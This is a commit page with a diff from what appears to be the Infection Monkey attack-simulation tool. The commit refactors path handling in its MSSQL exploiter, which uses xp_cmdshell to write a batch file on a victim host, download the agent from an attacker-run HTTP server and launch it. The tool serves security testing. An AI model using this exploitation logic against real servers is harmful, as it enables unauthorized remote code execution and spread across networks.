p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Agent: Use PureWindowsPath in MSSQLExploiter 

When using PurePath, Linux agents use the wrong path separator to build
Windows paths. Windows corrects this, so there's no actual issue, but
it's sloppy. Using PureWindowsPath objects creates the paths with the
correct separators

Before: xp_cmdshell "NUL>%temp%\tmp_monkey_dir/tmp_monkey.bat"
After: xp_cmdshell "NUL>%temp%\tmp_monkey_dir\tmp_monkey.bat"
This commit is contained in:
Mike Salvatore 2022-06-14 11:32:54 -04:00
parent ef63f2699b
commit ea980c4594
1 changed files with 10 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -1,6 +1,5 @@
import logging import logging
import os from pathlib import PureWindowsPath
from pathlib import PurePath
from time import sleep from time import sleep
import pymssql import pymssql
@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter):
# Temporary file that saves commands for monkey's download and execution. # Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = "tmp_monkey.bat" TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 12800 MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter):
super().__init__() super().__init__()
self.cursor = None self.cursor = None
self.agent_http_path = None self.agent_http_path = None
self.payload_file_path = os.path.join( self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
)
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
""" """
@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter):
return self.exploit_result return self.exploit_result
def run_payload_file(self): def run_payload_file(self):
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path) file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path))
return self.run_mssql_command(file_running_command) return self.run_mssql_command(file_running_command)
def create_temp_dir(self): def create_temp_dir(self):
@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter):
raise Exception("Couldn't execute MSSQL exploiter because payload was too long") raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
self.run_mssql_commands(array_of_commands) self.run_mssql_commands(array_of_commands)
def run_monkey(self, monkey_path_on_victim: PurePath): def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
logger.debug( logger.debug(
f"Launching the agent: {monkey_launch_command.prefix} -- " f"Launching the agent: {monkey_launch_command.prefix} -- "
@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter):
self.cursor.execute(cmd) self.cursor.execute(cmd)
sleep(MSSQLExploiter.QUERY_BUFFER) sleep(MSSQLExploiter.QUERY_BUFFER)
def upload_monkey(self, monkey_path_on_victim: PurePath): def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
self.run_payload_file() self.run_payload_file()
self.add_executed_cmd(monkey_download_command.command) self.add_executed_cmd(monkey_download_command.command)
@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter):
) )
self.run_mssql_command(tmp_dir_removal_command) self.run_mssql_command(tmp_dir_removal_command)
def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer: def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_repository self.host, str(monkey_path_on_victim), self.agent_repository
) )
@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter):
http_thread.stop() http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT) http_thread.join(LONG_REQUEST_TIMEOUT)
def write_download_command_to_payload(self, monkey_path_on_victim: PurePath): def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
self.run_mssql_command(monkey_download_command) self.run_mssql_command(monkey_download_command)
return monkey_download_command return monkey_download_command
def get_monkey_launch_command(self, monkey_path_on_victim: PurePath): def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
# Form monkey's launch command # Form monkey's launch command
monkey_args = build_monkey_commandline( monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, monkey_path_on_victim
@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter):
suffix=suffix, suffix=suffix,
) )
def get_monkey_download_command(self, monkey_path_on_victim: PurePath): def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
) )